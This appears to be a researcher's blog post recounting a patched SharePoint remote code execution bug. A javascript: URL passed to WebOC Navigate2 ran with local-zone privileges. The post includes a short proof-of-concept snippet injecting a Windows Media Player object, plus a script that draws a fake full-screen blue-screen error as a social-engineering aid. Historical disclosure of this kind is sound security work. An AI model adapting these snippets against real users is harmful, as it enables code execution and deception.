CFD SharePoint: Remote Code Execution via WebOC Navigate2

This was a remote code execution finding in a SharePoint component that exposed the WebBrowser control (WebOC) to web content via a CFD (Client-side Framework for DHTML) integration. The Navigate2 API could be called with a javascript: URL that injected a Windows Media Player object into a local-zone document and controlled it, or could directly launch local executables.

RCE via Modeless Dialog + WebOC Navigate2

wbControl.Navigate2(
    'javascript:void(document.body.innerHTML = ' +
    '"CMD<object classid=clsid:6BF52A52...></object>")',
    0, 'ifr_localFile'
);

// createpopup.html — fake BSOD covering the entire screen
var a = createPopup();
a.document.body.style.backgroundColor = "blue";
a.document.body.innerHTML = "<h1>A problem has been detected...</h1>";
a.show(0, 0, screen.width, screen.height);

The core issue was the same as in the Silverlight WebOC finding: Navigate2 with a javascript: URL ran the script in the hosting document’s zone rather than the appropriate sandboxed zone. In this case the hosting document was a local-zone SharePoint page, giving the injected script full local-machine privileges.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE Crash: View Source Crash with a 70 MB HTML File] :: [WebOC UXSS When FEATURE_VIEWLINKEDWEBOC_IS_UNSAFE Is Not Set] >

CFD SharePoint: Remote Code Execution via WebOC Navigate2

RCE via Modeless Dialog + WebOC Navigate2

Full-Screen Overlay via createPopup (Social Engineering Aid)